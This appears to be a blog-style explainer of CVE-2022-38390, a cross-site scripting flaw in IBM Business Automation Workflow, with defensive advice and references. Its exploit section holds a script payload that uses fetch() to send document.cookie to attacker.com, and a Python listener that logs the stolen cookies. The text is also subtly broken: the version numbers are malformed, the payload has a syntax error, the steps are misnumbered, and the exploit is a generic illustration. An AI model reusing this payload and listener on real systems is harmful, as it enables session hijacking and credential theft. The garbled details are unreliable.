CVE-2022-38390 - How Cross-Site Scripting (XSS) in IBM Business Automation Workflow Can Leak Your Credentials

IBM Business Automation Workflow is a popular tool for businesses to automate processes and improve work efficiency. But like all software, it isn’t immune to vulnerabilities. In this exclusive breakdown, we dig deep into CVE-2022-38390—a flaw that opened the doors for cross-site scripting (XSS) attacks on multiple IBM Business Automation Workflow (BAW) versions. We’ll show you the exploit, explain the risks, and share original references.

What is CVE-2022-38390?

This vulnerability was discovered and tracked as IBM X-Force ID: 233978 (X-Force Exchange). It exists in several releases of IBM Business Automation Workflow. It’s caused by insufficient sanitization of user-supplied input in the BAW web interface.

Impact:  
Attackers can inject malicious JavaScript into forms and pages, which then execute in the browser of anyone viewing those pages. Since BAW is typically used by employees within trusted sessions, this can lead to credential theft, session hijacking, or even full account takeover.

User Interaction: Required—the victim needs to load the malicious page.

This is especially dangerous in internal environments, where staff are assumed trusted and may have broad access.

Vulnerable Versions

IBM’s official security bulletin lists the affected versions, including:

IBM Cloud Pak for Business Automation 21..2 - 21..3

Always check the original IBM notice for the most current information.

Exploit Details

Let’s see how an attacker could exploit this bug in the wild. Suppose the workflow UI has a form where users can enter their “department name.”

The problem: The system does not filter out HTML or JavaScript when displaying this field back to users.

Payload

<script>
  fetch('https://attacker.com/steal?cookie='; + document.cookie);
</script>

*User enters this as their department name.*

Step 2: The Malicious Script Executes

Whenever a page displays this department name (e.g., a report, dashboard, or approval queue), the victim’s browser runs the injected code.

On their end, attackers set up a simple HTTP server to catch the incoming steal requests

# attacker_server.py example
from http.server import HTTPServer, BaseHTTPRequestHandler

class StealHandler(BaseHTTPRequestHandler):
    def do_GET(self):
        print(self.path)  # Logs: /steal?cookie=...
        self.send_response(200)
        self.end_headers()

HTTPServer(('...', 80), StealHandler).serve_forever()

The attacker uses these cookies to hijack the victim’s session.

Preventive Measures

IBM’s Fix:  
IBM released patches. Update immediately! See: IBM Security Bulletin

Never trust user input—always sanitize or escape data rendered in HTML.

- Use security libraries (like DOMPurify) to filter scripts.

Key References

- CVE-2022-38390 at NVD
- IBM X-Force Exchange 233978
- IBM Security Bulletin

Closing Thoughts

CVE-2022-38390 reminds us: Security starts with safe data handling. Even reputable tools like IBM BAW can have major holes if input isn’t cleaned. Update your software, test for XSS, and always limit the impact should something slip through.

Timeline

Published on: 11/17/2022 17:15:00 UTC
Last modified on: 11/18/2022 18:58:00 UTC